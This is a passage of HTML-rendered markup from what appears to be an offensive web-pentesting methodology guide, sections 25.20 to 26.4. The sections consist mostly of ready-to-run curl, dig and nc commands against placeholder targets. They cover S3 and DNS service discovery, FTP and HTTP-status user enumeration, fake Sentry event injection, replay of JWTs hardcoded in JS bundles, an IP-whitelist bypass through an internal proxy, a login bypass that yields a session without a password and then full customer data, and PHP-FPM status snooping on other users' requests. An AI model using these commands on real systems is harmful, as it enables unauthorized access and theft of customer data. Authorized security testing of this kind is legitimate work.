&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#f2d5cf"&gt;status&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#ca9ee6"&gt;$(&lt;/span&gt;curl -sk -o /dev/null -w &lt;span style="color:#a6d189"&gt;&amp;#34;%{http_code}&amp;#34;&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;https://&lt;/span&gt;&lt;span style="color:#a6d189"&gt;${&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;name&lt;/span&gt;&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;.s3.amazonaws.com/&amp;#34;&lt;/span&gt;&lt;span style="color:#ca9ee6"&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#99d1db;font-weight:bold"&gt;[&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$status&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt; !&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;404&amp;#34;&lt;/span&gt; &lt;span style="color:#99d1db;font-weight:bold"&gt;]&lt;/span&gt; &lt;span style="color:#99d1db;font-weight:bold"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span style="color:#99d1db"&gt;echo&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$name&lt;/span&gt;&lt;span style="color:#a6d189"&gt; → &lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$status&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;done&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="2520-wildcard-dns-detection--hidden-service-discovery" &gt;
&lt;div&gt;
&lt;a href="#2520-wildcard-dns-detection--hidden-service-discovery"&gt;
##
&lt;/a&gt;
25.20 Wildcard DNS Detection + Hidden Service Discovery
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Check if DNS is wildcard&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;dig +short &lt;span style="color:#a6d189"&gt;&amp;#34;random123xyz.TARGET.com&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# If it resolves → wildcard DNS (any subdomain resolves)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Wildcard DNS = try service names to discover hidden hosts&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f2d5cf"&gt;services&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;api chat ws whatsapp painel intranet crm nfe backup monitor zabbix grafana storage vpn n8n supabase jenkins gitlab registry&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;for&lt;/span&gt; svc in &lt;span style="color:#f2d5cf"&gt;$services&lt;/span&gt;; &lt;span style="color:#ca9ee6"&gt;do&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#f2d5cf"&gt;ip&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#ca9ee6"&gt;$(&lt;/span&gt;dig +short &lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$svc&lt;/span&gt;&lt;span style="color:#a6d189"&gt;.TARGET.com&amp;#34;&lt;/span&gt; | head -1&lt;span style="color:#ca9ee6"&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#99d1db;font-weight:bold"&gt;[&lt;/span&gt; -n &lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$ip&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt; &lt;span style="color:#99d1db;font-weight:bold"&gt;]&lt;/span&gt; &lt;span style="color:#99d1db;font-weight:bold"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span style="color:#99d1db"&gt;echo&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$svc&lt;/span&gt;&lt;span style="color:#a6d189"&gt;.TARGET.com → &lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$ip&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;done&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="2521-ftp-user-enumeration-via-timing" &gt;
&lt;div&gt;
&lt;a href="#2521-ftp-user-enumeration-via-timing"&gt;
##
&lt;/a&gt;
25.21 FTP User Enumeration via Timing
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Identify valid users by response difference&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f2d5cf"&gt;users&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;admin sistemas egb root backup operator ftp upload download web www-data mysql postgres&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;for&lt;/span&gt; user in &lt;span style="color:#f2d5cf"&gt;$users&lt;/span&gt;; &lt;span style="color:#ca9ee6"&gt;do&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#99d1db"&gt;echo&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;USER &lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$user&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt; | timeout &lt;span style="color:#ef9f76"&gt;2&lt;/span&gt; nc -w1 FTP_HOST &lt;span style="color:#ef9f76"&gt;21&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; sleep 0.5
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;done&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# &amp;#34;331 User OK. Password required&amp;#34; → VALID user&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# &amp;#34;530 Invalid user&amp;#34; → does NOT exist&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="2522-varnish-cache--extreme-ttl-32-days" &gt;
&lt;div&gt;
&lt;a href="#2522-varnish-cache--extreme-ttl-32-days"&gt;
##
&lt;/a&gt;
25.22 Varnish Cache — Extreme TTL (32 days!)
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -sI &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/&amp;#34;&lt;/span&gt; | grep -iE &lt;span style="color:#a6d189"&gt;&amp;#34;age:|max-age|x-cache&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Age: 79550 (22 hours!)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# max-age: 2764800 (32 DAYS!)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Over 32 days, any WCD/WCP persists for an entire month&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="2523-sentry-dsn--fake-event-injection" &gt;
&lt;div&gt;
&lt;a href="#2523-sentry-dsn--fake-event-injection"&gt;
##
&lt;/a&gt;
25.23 Sentry DSN — Fake Event Injection
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Sentry DSN found in JS bundle: https://{key}@sentry.TARGET.com/{project_id}&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Test if it accepts ingestion (write-only DSN)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s -X POST &lt;span style="color:#a6d189"&gt;&amp;#34;https://{DSN_KEY}@sentry.TARGET.com/api/{project_id}/store/&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -H &lt;span style="color:#a6d189"&gt;&amp;#34;Content-Type: application/json&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -d &lt;span style="color:#a6d189"&gt;&amp;#39;{&amp;#34;message&amp;#34;:&amp;#34;test&amp;#34;,&amp;#34;level&amp;#34;:&amp;#34;info&amp;#34;,&amp;#34;logger&amp;#34;:&amp;#34;research&amp;#34;}&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 200 OK → can inject fake events, cause alert fatigue&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Does NOT allow reading existing events (write-only)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="2524-hardcoded-jwts-as-app-tokens" &gt;
&lt;div&gt;
&lt;a href="#2524-hardcoded-jwts-as-app-tokens"&gt;
##
&lt;/a&gt;
25.24 Hardcoded JWTs as &amp;ldquo;App Tokens&amp;rdquo;
&lt;/div&gt;
&lt;/h3&gt;
&lt;p&gt;JWTs found in JS bundles may not need forgery — just reuse them:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-javascript" data-lang="javascript"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;// Example: found in JS bundle
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;const&lt;/span&gt; BOT_JWT &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0...&amp;#34;&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;// Usage: send as authentication header
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;// The server blindly trusts this token to identify the application
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Replay the found JWT&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;https://API.TARGET.com/bff-api/stores&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -H &lt;span style="color:#a6d189"&gt;&amp;#34;X-App-Id: bot&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -H &lt;span style="color:#a6d189"&gt;&amp;#34;X-App-Token: eyJhbGciOiJIUzI1NiIs...&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;strong&gt;Real-world case&lt;/strong&gt;: Delivery platform — 2 HS256 JWTs hardcoded (&lt;code&gt;appName: bot&lt;/code&gt;, &lt;code&gt;appName: dashboard&lt;/code&gt;), used as &amp;ldquo;app tokens&amp;rdquo; to authenticate BFF API requests. The server blindly trusted them.&lt;/p&gt;
&lt;hr&gt;
&lt;h2 id="26-advanced-techniques--part-2" &gt;
&lt;div&gt;
&lt;a href="#26-advanced-techniques--part-2"&gt;
#
&lt;/a&gt;
26. ADVANCED TECHNIQUES — PART 2
&lt;/div&gt;
&lt;/h2&gt;
&lt;h3 id="261-ip-whitelist-bypass-via-internal-proxy-ssrf" &gt;
&lt;div&gt;
&lt;a href="#261-ip-whitelist-bypass-via-internal-proxy-ssrf"&gt;
##
&lt;/a&gt;
26.1 IP Whitelist Bypass via Internal Proxy SSRF
&lt;/div&gt;
&lt;/h3&gt;
&lt;p&gt;When an API is protected by IP whitelist but there&amp;rsquo;s an internal proxy running on the server:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Direct call → blocked by the IP whitelist:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;https://api.TARGET.com/webservice/v1/cliente&amp;#34;&lt;/span&gt; -H &lt;span style="color:#a6d189"&gt;&amp;#34;Authorization: Basic ...&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# → &amp;#34;Your IP is not authorized to log in!&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Bypass via internal proxy (the server&amp;#39;s IP IS on the whitelist):&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;http://TARGET_IP:8085/proxy-ixc.php&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -H &lt;span style="color:#a6d189"&gt;&amp;#34;Content-Type: application/json&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -d &lt;span style="color:#a6d189"&gt;&amp;#39;{&amp;#34;action&amp;#34;:&amp;#34;listar&amp;#34;,&amp;#34;tabela&amp;#34;:&amp;#34;cliente&amp;#34;,&amp;#34;limit&amp;#34;:100}&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Flow: Your IP ──✅──&amp;gt; proxy.php (on the server) ──✅──&amp;gt; API (server&amp;#39;s IP on the whitelist)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Look for PHP proxies on alternative ports (8085, 8080, 3000, 5000) with endpoints like &lt;code&gt;/proxy.php&lt;/code&gt;, &lt;code&gt;/api-proxy/&lt;/code&gt;, &lt;code&gt;/forward&lt;/code&gt;.&lt;/p&gt;
&lt;h3 id="262-login-without-password-validation-action-based-routing" &gt;
&lt;div&gt;
&lt;a href="#262-login-without-password-validation-action-based-routing"&gt;
##
&lt;/a&gt;
26.2 Login Without Password Validation (Action-Based Routing)
&lt;/div&gt;
&lt;/h3&gt;
&lt;p&gt;PHP systems that use the &lt;code&gt;ACTION&lt;/code&gt; parameter to route functions may skip password validation:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# NORMAL login: ACTION=login → validates user + password&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# BYPASS login: ACTION=getValidaLogin → ONLY validates whether the CPF/USER exists&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#39;https://TARGET.com/central_assinante_web/model/login/login.php&amp;#39;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -d &lt;span style="color:#a6d189"&gt;&amp;#39;ACTION=getValidaLogin&amp;amp;USER=***.***.***-**&amp;amp;ID_CLIENTE=0&amp;amp;APP=N&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# → {&amp;#34;tipo&amp;#34;:&amp;#34;sucesso&amp;#34;,&amp;#34;mensagem&amp;#34;:{&amp;#34;sessao&amp;#34;:&amp;#34;xxxxxxxx...&amp;#34;}}&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Session returned without checking the password!&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Use the session cookie for protected endpoints:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#39;https://TARGET.com/.../faturas.php?ACTION=getFaturas&amp;amp;APP=N&amp;#39;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -H &lt;span style="color:#a6d189"&gt;&amp;#39;Cookie: sessao=xxxxxxxx&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# → Full customer data&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;strong&gt;Pattern&lt;/strong&gt;: Look for &lt;code&gt;ACTION&lt;/code&gt;, &lt;code&gt;action&lt;/code&gt;, &lt;code&gt;method&lt;/code&gt;, &lt;code&gt;op&lt;/code&gt;, &lt;code&gt;do&lt;/code&gt; parameters in legacy PHP apps. Test values like &lt;code&gt;getValidaLogin&lt;/code&gt;, &lt;code&gt;validar&lt;/code&gt;, &lt;code&gt;auth&lt;/code&gt;, &lt;code&gt;checkUser&lt;/code&gt;, &lt;code&gt;getSession&lt;/code&gt;.&lt;/p&gt;
&lt;h3 id="263-php-fpm-status-page--real-time-intelligence" &gt;
&lt;div&gt;
&lt;a href="#263-php-fpm-status-page--real-time-intelligence"&gt;
##
&lt;/a&gt;
26.3 PHP-FPM Status Page — Real-Time Intelligence
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Requires the correct Host header and a browser User-Agent&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s -H &lt;span style="color:#a6d189"&gt;&amp;#34;Host: TARGET&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -H &lt;span style="color:#a6d189"&gt;&amp;#34;User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;http://TARGET_IP:80/status&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Returns IN REAL TIME:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# - pool: www, process manager: dynamic&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# - PID, state, start time, requests, request URI, request method&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# - SCRIPT FILENAME: /var/www/ws/index.php (internal path!)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# - active/idle/total processes&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# - Content of the current request (POST bodies visible!)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Build a monitoring dashboard (poll every 3s):&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;watch -n &lt;span style="color:#ef9f76"&gt;3&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#39;curl -s -H &amp;#34;Host: TARGET&amp;#34; -H &amp;#34;User-Agent: Mozilla/5.0&amp;#34; http://IP/status&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;If requests appear on the status page → you see in real time what other users are doing.&lt;/p&gt;
&lt;h3 id="264-user-enumeration-via-differentiated-http-status-codes" &gt;
&lt;div&gt;
&lt;a href="#264-user-enumeration-via-differentiated-http-status-codes"&gt;
##
&lt;/a&gt;
26.4 User Enumeration via Differentiated HTTP Status Codes
&lt;/div&gt;
&lt;/h3&gt;
&lt;p&gt;Some endpoints return DIFFERENT codes for user exists vs doesn&amp;rsquo;t exist:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Example: 400 = user EXISTS (password too short), 401 = does NOT exist&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s -w &lt;span style="color:#a6d189"&gt;&amp;#34;\n%{http_code}&amp;#34;&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET.com/api/v1/auth/login&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -H &lt;span style="color:#a6d189"&gt;&amp;#34;Content-Type: application/json&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -d &lt;span style="color:#a6d189"&gt;&amp;#39;{&amp;#34;email&amp;#34;:&amp;#34;admin@target.com&amp;#34;,&amp;#34;password&amp;#34;:&amp;#34;12345&amp;#34;,&amp;#34;tenantSlug&amp;#34;:&amp;#34;target&amp;#34;}&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# → 400: password too short → user EXISTS&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# → 401: unauthorized → user does NOT exist&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Common patterns:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;400 vs 401&lt;/strong&gt;: user exists vs doesn&amp;rsquo;t exist&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;403 vs 404&lt;/strong&gt;: protected vs non-existent endpoint&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Different response time&lt;/strong&gt; (&amp;gt;200ms = exists)&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Different body size&lt;/strong&gt; (different error message)&lt;/li&gt;
